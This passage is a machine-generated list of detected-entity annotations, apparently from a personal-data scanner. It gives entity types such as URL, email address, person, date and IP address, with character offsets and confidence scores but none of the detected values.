end: 8057, score: 0.5, type: URL, start: 8096, end: 8102, score: 0.5, type: URL, start: 8106, end: 8112, score: 0.5, type: URL, start: 8475, end: 8483, score: 0.5, type: URL, start: 8514, end: 8520, score: 0.5, type: URL, start: 8562, end: 8572, score: 0.5, type: URL, start: 8629, end: 8635, score: 0.5, type: URL, start: 8916, end: 8923, score: 0.5, type: URL, start: 8934, end: 8940, score: 0.5, type: URL, start: 8963, end: 8970, score: 0.5, type: URL, start: 8991, end: 8997, score: 0.5, type: URL, start: 9001, end: 9007, score: 0.5, type: URL, start: 9328, end: 9336, score: 0.5, type: URL, start: 9367, end: 9373, score: 0.5, type: URL, start: 9415, end: 9425, score: 0.5, type: URL, start: 9482, end: 9488, score: 0.5, type: URL, start: 9517, end: 9524, score: 0.5, type: URL, start: 9535, end: 9541, score: 0.5, type: URL, start: 9564, end: 9571, score: 0.5, type: URL, start: 9610, end: 9616, score: 0.5, type: URL, start: 9973, end: 9981, score: 0.5, type: URL, start: 10012, end: 10018, score: 0.5, type: URL, start: 10060, end: 10070, score: 0.5, type: URL, start: 10127, end: 10133, score: 0.5, type: URL, start: 10162, end: 10169, score: 0.5, type: URL, start: 10180, end: 10186, score: 0.5, type: URL, start: 10209, end: 10216, score: 0.5, type: URL, start: 10255, end: 10261, score: 0.5, type: URL, start: 10653, end: 10661, score: 0.5, type: URL, start: 10692, end: 10698, score: 0.5, type: URL, start: 10740, end: 10750, score: 0.5, type: URL, start: 10807, end: 10813, score: 0.5, type: URL, start: 10842, end: 10849, score: 0.5, type: URL, start: 10860, end: 10866, score: 0.5, type: URL, start: 10889, end: 10896, score: 0.5, type: URL, start: 10930, end: 10936, score: 0.5, type: URL, start: 11286, end: 11294, score: 0.5, type: URL, start: 11325, end: 11331, score: 0.5, type: URL, start: 11373, end: 11383, score: 0.5, type: URL, start: 11440, end: 11446, score: 0.5, type: URL, start: 11475, end: 11482, score: 0.5, type: URL, start: 11493, end: 11499, score: 0.5, type: URL, start: 11913, end: 11921, score: 0.5, type: URL, start: 11952, end: 11958, score: 0.5, type: URL, start: 12000, end: 12010, score: 0.5, type: URL, start: 12066, end: 12072, score: 0.5, type: URL, start: 12101, end: 12108, score: 0.5, type: URL, start: 12119, end: 12125, score: 0.5, type: URL, start: 12171, end: 12177, score: 0.5, type: URL, start: 12198, end: 12205, score: 0.5, type: URL, start: 12384, end: 12392, score: 0.5, type: URL, start: 12437, end: 12443, score: 0.5, type: URL, 
start: 12549, end: 12555, score: 0.5, type: URL, start: 12584, end: 12591, score: 0.5, type: URL, start: 12602, end: 12608, score: 0.5, type: URL, start: 12654, end: 12660, score: 0.5, type: URL, start: 12776, end: 12783, score: 0.5, type: URL, start: 12832, end: 12839, score: 0.5, type: URL, start: 13295, end: 13303, score: 0.5, type: URL, start: 13334, end: 13340, score: 0.5, type: URL, start: 13362, end: 13368, score: 0.5, type: URL, start: 13423, end: 13433, score: 0.5, type: URL, start: 13489, end: 13495, score: 0.5, type: URL, start: 13524, end: 13531, score: 0.5, type: URL, start: 13542, end: 13548, score: 0.5, type: URL, start: 13740, end: 13747, score: 0.5, type: URL, start: 13845, end: 13853, score: 0.5, type: URL, start: 13884, end: 13890, score: 0.5, type: URL, start: 13932, end: 13942, score: 0.5, type: URL, start: 13999, end: 14005, score: 0.5, type: URL, start: 14034, end: 14041, score: 0.5, type: URL, start: 14052, end: 14058, score: 0.5, type: URL, start: 14138, end: 14145, score: 0.5, type: URL, start: 14472, end: 14480, score: 0.5, type: URL, start: 14511, end: 14517, score: 0.5, type: URL, start: 14540, end: 14546, score: 0.5, type: URL, start: 14556, end: 14567, score: 0.5, type: URL, start: 14581, end: 14588, score: 0.5, type: URL, start: 14635, end: 14645, score: 0.5, type: URL, start: 14702, end: 14708, score: 0.5, type: URL, start: 14737, end: 14744, score: 0.5, type: URL, start: 14755, end: 14761, score: 0.5, type: URL, start: 14833, end: 14840, score: 0.5, type: URL, start: 15123, end: 15131, score: 0.5, type: URL, start: 15162, end: 15168, score: 0.5, type: URL, start: 15191, end: 15197, score: 0.5, type: URL, start: 15209, end: 15216, score: 0.5, type: URL, start: 15262, end: 15272, score: 0.5, type: URL, start: 15329, end: 15335, score: 0.5, type: URL, start: 15364, end: 15371, score: 0.5, type: URL, start: 15382, end: 15388, score: 0.5, type: URL, start: 15487, end: 15494, score: 0.5, type: URL, start: 15896, end: 15904, score: 0.5, type: URL, start: 15935, end: 15941, score: 0.5, type: URL, start: 15983, end: 15993, score: 0.5, type: URL, start: 16043, end: 16049, score: 0.5, type: URL, start: 16086, end: 16092, score: 0.5, type: URL, start: 16121, end: 16128, score: 0.5, type: URL, start: 16139, end: 16145, score: 0.5, type: URL, start: 16242, end: 16249, score: 0.5, type: URL, start: 16541, end: 16549, score: 0.5, type: URL, start: 16580, end: 16586, score: 0.5, type: URL, start: 16609, end: 16615, score: 0.5, type: URL, start: 16666, end: 16676, score: 0.5, type: URL, start: 16733, end: 16739, score: 0.5, type: URL, start: 16768, end: 16775, score: 0.5, type: URL, start: 16786, end: 16792, score: 0.5, type: URL, start: 16895, end: 16902, score: 0.5, type: URL, start: 17194, end: 17202, score: 0.5, type: URL, start: 17233, end: 17239, score: 0.5, type: URL, start: 17261, end: 17267, score: 0.5, type: URL, start: 17318, end: 17328, score: 0.5, type: URL, start: 17385, end: 17391, score: 0.5, type: URL, start: 17420, end: 17427, score: 0.5, type: URL, start: 17438, end: 17444, score: 0.5, type: URL, start: 17504, end: 17511, score: 0.5, type: URL, start: 17535, end: 17543, score: 0.5, type: URL, start: 17574, end: 17580, score: 0.5, type: URL, start: 17602, end: 17608, score: 0.5, type: URL, start: 17667, end: 17677, score: 0.5, type: URL, start: 17734, end: 17740, score: 0.5, type: URL, start: 17769, end: 17776, score: 0.5, type: URL, start: 17787, end: 17793, score: 0.5, type: URL, start: 18108, end: 18116, score: 0.5, type: URL, start: 18147, end: 18153, 
score: 0.5, type: URL, start: 18195, end: 18205, score: 0.5, type: URL, start: 18261, end: 18267, score: 0.5, type: URL, start: 18318, end: 18324, score: 0.5, type: URL, start: 18345, end: 18352, score: 0.5, type: URL, start: 18514, end: 18522, score: 0.5, type: URL, start: 18567, end: 18573, score: 0.5, type: URL, start: 18601, end: 18607, score: 0.5, type: URL, start: 18636, end: 18643, score: 0.5, type: URL, start: 18653, end: 18659, score: 0.5, type: URL, start: 18682, end: 18689, score: 0.5, type: URL, start: 18748, end: 18755, score: 0.5, type: URL, start: 19730, end: 19738, score: 0.5, type: URL, start: 19769, end: 19775, score: 0.5, type: URL, start: 19817, end: 19827, score: 0.5, type: URL, start: 19883, end: 19889, score: 0.5, type: URL, start: 19918, end: 19925, score: 0.5, type: URL, start: 19936, end: 19942, score: 0.5, type: URL, start: 19988, end: 19994, score: 0.5, type: URL, start: 20015, end: 20022, score: 0.5, type: URL, start: 20138, end: 20146, score: 0.5, type: URL, start: 20197, end: 20203, score: 0.5, type: URL, start: 20232, end: 20239, score: 0.5, type: URL, start: 20249, end: 20255, score: 0.5, type: URL, start: 20278, end: 20285, score: 0.5, type: URL, start: 20299, end: 20305, score: 0.5, type: URL, start: 20525, end: 20533, score: 0.5, type: URL, start: 20564, end: 20570, score: 0.5, type: URL, start: 20612, end: 20622, score: 0.5, type: URL, start: 20738, end: 20744, score: 0.5, type: URL, start: 20770, end: 20776, score: 0.5, type: URL, start: 20805, end: 20812, score: 0.5, type: URL, start: 20823, end: 20829, score: 0.5, type: URL, start: 21724, end: 21732, score: 0.5, type: URL, start: 21763, end: 21769, score: 0.5, type: URL, start: 21811, end: 21821, score: 0.5, type: URL, start: 21937, end: 21943, score: 0.5, type: URL, start: 21984, end: 21990, score: 0.5, type: URL, start: 22019, end: 22026, score: 0.5, type: URL, start: 22037, end: 22043, score: 0.5, type: URL, start: 22431, end: 22439, score: 0.5, type: URL, start: 22470, end: 22476, score: 0.5, type: URL, start: 22518, end: 22528, score: 0.5, type: URL, start: 22644, end: 22650, score: 0.5, type: URL, start: 22691, end: 22697, score: 0.5, type: URL, start: 22726, end: 22733, score: 0.5, type: URL, start: 22744, end: 22750, score: 0.5, type: URL, start: 22925, end: 22932, score: 0.5, type: URL, start: 23126, end: 23132, score: 0.5, type: URL, start: 23153, end: 23160, score: 0.5, type: URL, start: 23259, end: 23266, score: 0.5, type: URL, start: 23449, end: 23457, score: 0.5, type: URL, start: 23502, end: 23508, score: 0.5, type: URL, start: 23614, end: 23620, score: 0.5, type: URL, start: 23649, end: 23656, score: 0.5, type: URL, start: 23667, end: 23673, score: 0.5, type: URL, start: 23775, end: 23782, score: 0.5, type: URL, start: 24070, end: 24078, score: 0.5, type: URL, start: 24109, end: 24115, score: 0.5, type: URL, start: 24157, end: 24167, score: 0.5, type: URL, start: 24283, end: 24289, score: 0.5, type: URL, start: 24330, end: 24336, score: 0.5, type: URL, start: 24365, end: 24372, score: 0.5, type: URL, start: 24383, end: 24389, score: 0.5, type: URL, start: 24563, end: 24570, score: 0.5, type: URL, start: 24919, end: 24927, score: 0.5, type: URL, start: 24958, end: 24964, score: 0.5, type: URL, start: 25006, end: 25016, score: 0.5, type: URL, start: 25132, end: 25138, score: 0.5, type: URL, start: 25179, end: 25185, score: 0.5, type: URL, start: 25214, end: 25221, score: 0.5, type: URL, start: 25232, end: 25238, score: 0.5, type: URL, start: 25410, end: 25417, score: 0.5, type: URL, 
[detected elements, continued: several thousand machine-generated annotations of the form "type: <ENTITY_TYPE>, start: <offset>, end: <offset>, score: <confidence>". Offsets are character positions within each row's content field and restart for each row (reaching roughly 119130 in the longest run shown here). Entity types observed in this stretch, with their typical scores: URL (0.5, occasionally 0.6 or 0.95), EMAIL_ADDRESS (1.0), DATE_TIME (0.85), LOCATION (0.85), PERSON (0.85), and IP_ADDRESS (0.6). The dump breaks off mid-entry at "type: PERSON,".]
start: 10778, end: 10783, score: 0.85, type: PERSON, start: 12200, end: 12205, score: 0.85, type: PERSON, start: 17789, end: 17833, score: 0.85, type: URL, start: 9665, end: 9715, score: 0.6, type: URL, start: 79, end: 89, score: 0.5, type: URL, start: 160, end: 169, score: 0.5, type: URL, start: 193, end: 216, score: 0.5, type: URL, start: 238, end: 267, score: 0.5, type: URL, start: 288, end: 302, score: 0.5, type: URL, start: 332, end: 341, score: 0.5, type: URL, start: 391, end: 400, score: 0.5, type: URL, start: 519, end: 534, score: 0.5, type: URL, start: 1050, end: 1059, score: 0.5, type: URL, start: 1427, end: 1446, score: 0.5, type: URL, start: 1598, end: 1617, score: 0.5, type: URL, start: 1693, end: 1707, score: 0.5, type: URL, start: 1965, end: 1976, score: 0.5, type: URL, start: 2242, end: 2261, score: 0.5, type: URL, start: 2310, end: 2330, score: 0.5, type: URL, start: 2358, end: 2369, score: 0.5, type: URL, start: 2517, end: 2537, score: 0.5, type: URL, start: 2557, end: 2571, score: 0.5, type: URL, start: 2618, end: 2629, score: 0.5, type: URL, start: 2739, end: 2743, score: 0.5, type: URL, start: 3216, end: 3223, score: 0.5, type: URL, start: 3306, end: 3313, score: 0.5, type: URL, start: 3376, end: 3383, score: 0.5, type: URL, start: 3457, end: 3464, score: 0.5, type: URL, start: 3841, end: 3860, score: 0.5, type: URL, start: 3963, end: 3982, score: 0.5, type: URL, start: 4046, end: 4065, score: 0.5, type: URL, start: 4142, end: 4150, score: 0.5, type: URL, start: 4642, end: 4650, score: 0.5, type: URL, start: 5010, end: 5021, score: 0.5, type: URL, start: 5143, end: 5159, score: 0.5, type: URL, start: 5204, end: 5212, score: 0.5, type: URL, start: 5222, end: 5230, score: 0.5, type: URL, start: 5267, end: 5275, score: 0.5, type: URL, start: 5279, end: 5287, score: 0.5, type: URL, start: 5348, end: 5356, score: 0.5, type: URL, start: 5360, end: 5368, score: 0.5, type: URL, start: 5405, end: 5413, score: 0.5, type: URL, start: 5417, end: 5425, score: 0.5, type: URL, start: 5506, end: 5526, score: 0.5, type: URL, start: 5662, end: 5673, score: 0.5, type: URL, start: 5773, end: 5792, score: 0.5, type: URL, start: 5843, end: 5852, score: 0.5, type: URL, start: 5879, end: 5890, score: 0.5, type: URL, start: 5971, end: 5978, score: 0.5, type: URL, start: 6073, end: 6081, score: 0.5, type: URL, start: 6206, end: 6214, score: 0.5, type: URL, start: 6338, end: 6345, score: 0.5, type: URL, start: 6450, end: 6469, score: 0.5, type: URL, start: 6563, end: 6582, score: 0.5, type: URL, start: 6687, end: 6706, score: 0.5, type: URL, start: 6823, end: 6832, score: 0.5, type: URL, start: 6878, end: 6887, score: 0.5, type: URL, start: 6929, end: 6938, score: 0.5, type: URL, start: 7000, end: 7011, score: 0.5, type: URL, start: 7131, end: 7145, score: 0.5, type: URL, start: 7275, end: 7279, score: 0.5, type: URL, start: 7298, end: 7302, score: 0.5, type: URL, start: 7323, end: 7343, score: 0.5, type: URL, start: 7355, end: 7359, score: 0.5, type: URL, start: 7450, end: 7463, score: 0.5, type: URL, start: 7829, end: 7843, score: 0.5, type: URL, start: 7882, end: 7886, score: 0.5, type: URL, start: 7905, end: 7909, score: 0.5, type: URL, start: 7930, end: 7950, score: 0.5, type: URL, start: 7962, end: 7966, score: 0.5, type: URL, start: 8030, end: 8041, score: 0.5, type: URL, start: 8186, end: 8201, score: 0.5, type: URL, start: 8237, end: 8251, score: 0.5, type: URL, start: 8442, end: 8461, score: 0.5, type: URL, start: 8559, end: 8563, score: 0.5, type: URL, start: 8586, end: 8590, score: 
0.5, type: URL, start: 8611, end: 8631, score: 0.5, type: URL, start: 8647, end: 8651, score: 0.5, type: URL, start: 8736, end: 8740, score: 0.5, type: URL, start: 8799, end: 8803, score: 0.5, type: URL, start: 8913, end: 8917, score: 0.5, type: URL, start: 9934, end: 9942, score: 0.5, type: URL, start: 10002, end: 10019, score: 0.5, type: URL, start: 10049, end: 10057, score: 0.5, type: URL, start: 10128, end: 10145, score: 0.5, type: URL, start: 10148, end: 10159, score: 0.5, type: URL, start: 10197, end: 10205, score: 0.5, type: URL, start: 10290, end: 10307, score: 0.5, type: URL, start: 10354, end: 10362, score: 0.5, type: URL, start: 10447, end: 10464, score: 0.5, type: URL, start: 10478, end: 10485, score: 0.5, type: URL, start: 10511, end: 10519, score: 0.5, type: URL, start: 10584, end: 10601, score: 0.5, type: URL, start: 10623, end: 10631, score: 0.5, type: URL, start: 10688, end: 10705, score: 0.5, type: URL, start: 11213, end: 11221, score: 0.5, type: URL, start: 11314, end: 11322, score: 0.5, type: URL, start: 11348, end: 11357, score: 0.5, type: URL, start: 11477, end: 11485, score: 0.5, type: URL, start: 11592, end: 11600, score: 0.5, type: URL, start: 11633, end: 11642, score: 0.5, type: URL, start: 11745, end: 11753, score: 0.5, type: URL, start: 11823, end: 11831, score: 0.5, type: URL, start: 12684, end: 12692, score: 0.5, type: URL, start: 12798, end: 12806, score: 0.5, type: URL, start: 12953, end: 12964, score: 0.5, type: URL, start: 13010, end: 13021, score: 0.5, type: URL, start: 13035, end: 13055, score: 0.5, type: URL, start: 13063, end: 13074, score: 0.5, type: URL, start: 13089, end: 13100, score: 0.5, type: URL, start: 13305, end: 13315, score: 0.5, type: URL, start: 13415, end: 13425, score: 0.5, type: URL, start: 13437, end: 13454, score: 0.5, type: URL, start: 13670, end: 13680, score: 0.5, type: URL, start: 13697, end: 13714, score: 0.5, type: URL, start: 13756, end: 13773, score: 0.5, type: URL, start: 13825, end: 13833, score: 0.5, type: URL, start: 13951, end: 13958, score: 0.5, type: URL, start: 14047, end: 14057, score: 0.5, type: URL, start: 14074, end: 14091, score: 0.5, type: URL, start: 14110, end: 14120, score: 0.5, type: URL, start: 14209, end: 14216, score: 0.5, type: URL, start: 14269, end: 14279, score: 0.5, type: URL, start: 14382, end: 14401, score: 0.5, type: URL, start: 14424, end: 14434, score: 0.5, type: URL, start: 14448, end: 14462, score: 0.5, type: URL, start: 14628, end: 14638, score: 0.5, type: URL, start: 14680, end: 14695, score: 0.5, type: URL, start: 14951, end: 14960, score: 0.5, type: URL, start: 15004, end: 15013, score: 0.5, type: URL, start: 15089, end: 15097, score: 0.5, type: URL, start: 15220, end: 15227, score: 0.5, type: URL, start: 15286, end: 15296, score: 0.5, type: URL, start: 15377, end: 15387, score: 0.5, type: URL, start: 15576, end: 15586, score: 0.5, type: URL, start: 15701, end: 15709, score: 0.5, type: URL, start: 15827, end: 15834, score: 0.5, type: URL, start: 15859, end: 15869, score: 0.5, type: URL, start: 15998, end: 16017, score: 0.5, type: URL, start: 16057, end: 16068, score: 0.5, type: URL, start: 16434, end: 16444, score: 0.5, type: URL, start: 16540, end: 16549, score: 0.5, type: URL, start: 16593, end: 16602, score: 0.5, type: URL, start: 16659, end: 16667, score: 0.5, type: URL, start: 16785, end: 16792, score: 0.5, type: URL, start: 16817, end: 16827, score: 0.5, type: URL, start: 16959, end: 16978, score: 0.5, type: URL, start: 17316, end: 17325, score: 0.5, type: URL, start: 17459, end: 
17469, score: 0.5, type: URL, start: 17584, end: 17592, score: 0.5, type: URL, start: 17710, end: 17717, score: 0.5, type: URL, start: 17789, end: 17808, score: 0.5, type: URL, start: 18005, end: 18012, score: 0.5, type: URL, start: 18192, end: 18211, score: 0.5, type: URL, start: 18265, end: 18276, score: 0.5, type: EMAIL_ADDRESS, start: 170, end: 185, score: 1.0, type: DATE_TIME, start: 146, end: 156, score: 0.95, type: PERSON, start: 76, end: 88, score: 0.85, type: DATE_TIME, start: 117, end: 121, score: 0.85, type: PERSON, start: 485, end: 489, score: 0.85, type: URL, start: 123, end: 132, score: 0.5, type: URL, start: 176, end: 185, score: 0.5, type: URL, start: 245, end: 250, score: 0.5, type: URL, start: 261, end: 266, score: 0.5, type: URL, start: 641, end: 649, score: 0.5, type: URL, start: 675, end: 683, score: 0.5, type: URL, start: 1112, end: 1116, score: 0.5, type: URL, start: 1225, end: 1231, score: 0.5, type: URL, start: 1337, end: 1344, score: 0.5, type: URL, start: 1391, end: 1398, score: 0.5, type: URL, start: 1679, end: 1689, score: 0.5, type: URL, start: 1842, end: 1847, score: 0.5, type: URL, start: 2100, end: 2108, score: 0.5, type: URL, start: 2344, end: 2352, score: 0.5, type: URL, start: 2589, end: 2597, score: 0.5, type: URL, start: 2666, end: 2674, score: 0.5, type: URL, start: 2763, end: 2776, score: 0.5, type: EMAIL_ADDRESS, start: 80, end: 95, score: 1.0, type: DATE_TIME, start: 66, end: 70, score: 0.85, type: PERSON, start: 71, end: 79, score: 0.85, type: LOCATION, start: 121, end: 129, score: 0.85, type: PERSON, start: 1588, end: 1590, score: 0.85, type: PERSON, start: 2675, end: 2707, score: 0.85, type: DATE_TIME, start: 3203, end: 3221, score: 0.85, type: LOCATION, start: 4238, end: 4242, score: 0.85, type: NRP, start: 4362, end: 4373, score: 0.85, type: NRP, start: 4420, end: 4431, score: 0.85, type: PERSON, start: 4970, end: 4981, score: 0.85, type: PERSON, start: 5027, end: 5048, score: 0.85, type: DATE_TIME, start: 6115, end: 6122, score: 0.85, type: LOCATION, start: 7087, end: 7089, score: 0.85, type: LOCATION, start: 7947, end: 7968, score: 0.85, type: PERSON, start: 8137, end: 8145, score: 0.85, type: PERSON, start: 10101, end: 10124, score: 0.85, type: PERSON, start: 10603, end: 10614, score: 0.85, type: PERSON, start: 10914, end: 10926, score: 0.85, type: PERSON, start: 11037, end: 11048, score: 0.85, type: PERSON, start: 11438, end: 11450, score: 0.85, type: NRP, start: 11626, end: 11633, score: 0.85, type: PERSON, start: 11693, end: 11728, score: 0.85, type: PERSON, start: 11974, end: 11997, score: 0.85, type: LOCATION, start: 12084, end: 12124, score: 0.85, type: PERSON, start: 12636, end: 12649, score: 0.85, type: LOCATION, start: 13259, end: 13263, score: 0.85, type: LOCATION, start: 14065, end: 14089, score: 0.85, type: PERSON, start: 15522, end: 15548, score: 0.85, type: URL, start: 724, end: 752, score: 0.6, type: URL, start: 11764, end: 11810, score: 0.6, type: URL, start: 11811, end: 11833, score: 0.6, type: URL, start: 86, end: 95, score: 0.5, type: URL, start: 910, end: 916, score: 0.5, type: URL, start: 1005, end: 1015, score: 0.5, type: URL, start: 1041, end: 1051, score: 0.5, type: URL, start: 1079, end: 1089, score: 0.5, type: URL, start: 1113, end: 1123, score: 0.5, type: URL, start: 1155, end: 1165, score: 0.5, type: URL, start: 1202, end: 1213, score: 0.5, type: URL, start: 1278, end: 1288, score: 0.5, type: URL, start: 1346, end: 1357, score: 0.5, type: URL, start: 1396, end: 1407, score: 0.5, type: URL, start: 1475, end: 1489, 
score: 0.5, type: URL, start: 1570, end: 1580, score: 0.5, type: URL, start: 1933, end: 1942, score: 0.5, type: URL, start: 2504, end: 2511, score: 0.5, type: URL, start: 2624, end: 2631, score: 0.5, type: URL, start: 2675, end: 2682, score: 0.5, type: URL, start: 2713, end: 2720, score: 0.5, type: URL, start: 2773, end: 2780, score: 0.5, type: URL, start: 2823, end: 2830, score: 0.5, type: URL, start: 2873, end: 2887, score: 0.5, type: URL, start: 2910, end: 2928, score: 0.5, type: URL, start: 2937, end: 2946, score: 0.5, type: URL, start: 3020, end: 3027, score: 0.5, type: URL, start: 3047, end: 3054, score: 0.5, type: URL, start: 3060, end: 3069, score: 0.5, type: URL, start: 3076, end: 3090, score: 0.5, type: URL, start: 3099, end: 3113, score: 0.5, type: URL, start: 3257, end: 3264, score: 0.5, type: URL, start: 3317, end: 3331, score: 0.5, type: URL, start: 3359, end: 3380, score: 0.5, type: URL, start: 3574, end: 3581, score: 0.5, type: URL, start: 3609, end: 3616, score: 0.5, type: URL, start: 3686, end: 3693, score: 0.5, type: URL, start: 3779, end: 3788, score: 0.5, type: URL, start: 3927, end: 3936, score: 0.5, type: URL, start: 3957, end: 3964, score: 0.5, type: URL, start: 4094, end: 4101, score: 0.5, type: URL, start: 4146, end: 4153, score: 0.5, type: URL, start: 4213, end: 4220, score: 0.5, type: URL, start: 4398, end: 4405, score: 0.5, type: URL, start: 4496, end: 4506, score: 0.5, type: URL, start: 4545, end: 4552, score: 0.5, type: URL, start: 4644, end: 4653, score: 0.5, type: URL, start: 4703, end: 4712, score: 0.5, type: URL, start: 4722, end: 4732, score: 0.5, type: URL, start: 4753, end: 4762, score: 0.5, type: URL, start: 4770, end: 4779, score: 0.5, type: URL, start: 4822, end: 4831, score: 0.5, type: URL, start: 4849, end: 4858, score: 0.5, type: URL, start: 4865, end: 4872, score: 0.5, type: URL, start: 4895, end: 4902, score: 0.5, type: URL, start: 4938, end: 4948, score: 0.5, type: URL, start: 4970, end: 4979, score: 0.5, type: URL, start: 5005, end: 5014, score: 0.5, type: URL, start: 5027, end: 5037, score: 0.5, type: URL, start: 5099, end: 5108, score: 0.5, type: URL, start: 5136, end: 5146, score: 0.5, type: URL, start: 5265, end: 5274, score: 0.5, type: URL, start: 5305, end: 5315, score: 0.5, type: URL, start: 5404, end: 5414, score: 0.5, type: URL, start: 5507, end: 5514, score: 0.5, type: URL, start: 5535, end: 5542, score: 0.5, type: URL, start: 5565, end: 5572, score: 0.5, type: URL, start: 5656, end: 5666, score: 0.5, type: URL, start: 5943, end: 5950, score: 0.5, type: URL, start: 5985, end: 5992, score: 0.5, type: URL, start: 6003, end: 6010, score: 0.5, type: URL, start: 6057, end: 6078, score: 0.5, type: URL, start: 6152, end: 6166, score: 0.5, type: URL, start: 6169, end: 6176, score: 0.5, type: URL, start: 6365, end: 6379, score: 0.5, type: URL, start: 6441, end: 6448, score: 0.5, type: URL, start: 6456, end: 6460, score: 0.5, type: URL, start: 6512, end: 6519, score: 0.5, type: URL, start: 6531, end: 6541, score: 0.5, type: URL, start: 6652, end: 6659, score: 0.5, type: URL, start: 6900, end: 6907, score: 0.5, type: URL, start: 6991, end: 7005, score: 0.5, type: URL, start: 7093, end: 7107, score: 0.5, type: URL, start: 7124, end: 7129, score: 0.5, type: URL, start: 7152, end: 7166, score: 0.5, type: URL, start: 7171, end: 7180, score: 0.5, type: URL, start: 7206, end: 7216, score: 0.5, type: URL, start: 7350, end: 7357, score: 0.5, type: URL, start: 7403, end: 7410, score: 0.5, type: URL, start: 7490, end: 7497, score: 0.5, type: URL, start: 
7602, end: 7612, score: 0.5, type: URL, start: 7631, end: 7640, score: 0.5, type: URL, start: 7661, end: 7670, score: 0.5, type: URL, start: 7688, end: 7697, score: 0.5, type: URL, start: 7771, end: 7778, score: 0.5, type: URL, start: 7804, end: 7819, score: 0.5, type: URL, start: 7900, end: 7907, score: 0.5, type: URL, start: 7951, end: 7958, score: 0.5, type: URL, start: 7987, end: 7996, score: 0.5, type: URL, start: 8118, end: 8127, score: 0.5, type: URL, start: 8150, end: 8159, score: 0.5, type: URL, start: 8173, end: 8180, score: 0.5, type: URL, start: 8279, end: 8288, score: 0.5, type: URL, start: 8370, end: 8379, score: 0.5, type: URL, start: 8405, end: 8412, score: 0.5, type: URL, start: 8437, end: 8444, score: 0.5, type: URL, start: 8522, end: 8531, score: 0.5, type: URL, start: 8626, end: 8633, score: 0.5, type: URL, start: 8663, end: 8672, score: 0.5, type: URL, start: 8711, end: 8720, score: 0.5, type: URL, start: 8800, end: 8809, score: 0.5, type: URL, start: 8812, end: 8818, score: 0.5, type: URL, start: 8889, end: 8898, score: 0.5, type: URL, start: 9052, end: 9062, score: 0.5, type: URL, start: 9082, end: 9091, score: 0.5, type: URL, start: 9245, end: 9255, score: 0.5, type: URL, start: 9276, end: 9285, score: 0.5, type: URL, start: 9306, end: 9315, score: 0.5, type: URL, start: 9326, end: 9333, score: 0.5, type: URL, start: 9356, end: 9363, score: 0.5, type: URL, start: 9427, end: 9436, score: 0.5, type: URL, start: 9455, end: 9464, score: 0.5, type: URL, start: 9503, end: 9512, score: 0.5, type: URL, start: 9565, end: 9574, score: 0.5, type: URL, start: 9577, end: 9583, score: 0.5, type: URL, start: 9652, end: 9661, score: 0.5, type: URL, start: 9819, end: 9829, score: 0.5, type: URL, start: 9851, end: 9860, score: 0.5, type: URL, start: 10004, end: 10013, score: 0.5, type: URL, start: 10081, end: 10090, score: 0.5, type: URL, start: 10116, end: 10122, score: 0.5, type: URL, start: 10180, end: 10187, score: 0.5, type: URL, start: 10241, end: 10248, score: 0.5, type: URL, start: 10281, end: 10288, score: 0.5, type: URL, start: 10310, end: 10317, score: 0.5, type: URL, start: 10378, end: 10385, score: 0.5, type: URL, start: 10400, end: 10407, score: 0.5, type: URL, start: 10413, end: 10420, score: 0.5, type: URL, start: 10443, end: 10450, score: 0.5, type: URL, start: 10454, end: 10461, score: 0.5, type: URL, start: 10467, end: 10474, score: 0.5, type: URL, start: 10539, end: 10546, score: 0.5, type: URL, start: 10570, end: 10580, score: 0.5, type: URL, start: 10603, end: 10612, score: 0.5, type: URL, start: 10647, end: 10654, score: 0.5, type: URL, start: 10663, end: 10669, score: 0.5, type: URL, start: 10681, end: 10688, score: 0.5, type: URL, start: 10729, end: 10735, score: 0.5, type: URL, start: 10774, end: 10781, score: 0.5, type: URL, start: 10829, end: 10835, score: 0.5, type: URL, start: 10875, end: 10882, score: 0.5, type: URL, start: 10914, end: 10920, score: 0.5, type: URL, start: 10934, end: 10941, score: 0.5, type: URL, start: 10967, end: 10974, score: 0.5, type: URL, start: 11009, end: 11019, score: 0.5, type: URL, start: 11037, end: 11046, score: 0.5, type: URL, start: 11070, end: 11077, score: 0.5, type: URL, start: 11094, end: 11100, score: 0.5, type: URL, start: 11126, end: 11135, score: 0.5, type: URL, start: 11155, end: 11164, score: 0.5, type: URL, start: 11188, end: 11197, score: 0.5, type: URL, start: 11219, end: 11226, score: 0.5, type: URL, start: 11278, end: 11285, score: 0.5, type: URL, start: 11438, end: 11444, score: 0.5, type: URL, start: 
11464, end: 11479, score: 0.5, type: URL, start: 11505, end: 11520, score: 0.5, type: URL, start: 11641, end: 11648, score: 0.5, type: URL, start: 11954, end: 11963, score: 0.5, type: URL, start: 11989, end: 11995, score: 0.5, type: URL, start: 12020, end: 12027, score: 0.5, type: URL, start: 12088, end: 12095, score: 0.5, type: URL, start: 12112, end: 12118, score: 0.5, type: URL, start: 12171, end: 12178, score: 0.5, type: URL, start: 12204, end: 12214, score: 0.5, type: URL, start: 12274, end: 12281, score: 0.5, type: URL, start: 12306, end: 12313, score: 0.5, type: URL, start: 12352, end: 12359, score: 0.5, type: URL, start: 12392, end: 12402, score: 0.5, type: URL, start: 12536, end: 12546, score: 0.5, type: URL, start: 12673, end: 12679, score: 0.5, type: URL, start: 12706, end: 12713, score: 0.5, type: URL, start: 12943, end: 12949, score: 0.5, type: URL, start: 13033, end: 13037, score: 0.5, type: URL, start: 13074, end: 13081, score: 0.5, type: URL, start: 13086, end: 13098, score: 0.5, type: URL, start: 13145, end: 13152, score: 0.5, type: URL, start: 13210, end: 13217, score: 0.5, type: URL, start: 13379, end: 13389, score: 0.5, type: URL, start: 13538, end: 13543, score: 0.5, type: URL, start: 13664, end: 13669, score: 0.5, type: URL, start: 13713, end: 13718, score: 0.5, type: URL, start: 13784, end: 13789, score: 0.5, type: URL, start: 13946, end: 13956, score: 0.5, type: URL, start: 13989, end: 13993, score: 0.5, type: URL, start: 14011, end: 14018, score: 0.5, type: URL, start: 14023, end: 14035, score: 0.5, type: URL, start: 14121, end: 14128, score: 0.5, type: URL, start: 14183, end: 14192, score: 0.5, type: URL, start: 14220, end: 14230, score: 0.5, type: URL, start: 14277, end: 14287, score: 0.5, type: URL, start: 14420, end: 14427, score: 0.5, type: URL, start: 14530, end: 14535, score: 0.5, type: URL, start: 14617, end: 14628, score: 0.5, type: URL, start: 14645, end: 14652, score: 0.5, type: URL, start: 14765, end: 14771, score: 0.5, type: URL, start: 14852, end: 14856, score: 0.5, type: URL, start: 14920, end: 14929, score: 0.5, type: URL, start: 14970, end: 14975, score: 0.5, type: URL, start: 15024, end: 15034, score: 0.5, type: URL, start: 15101, end: 15107, score: 0.5, 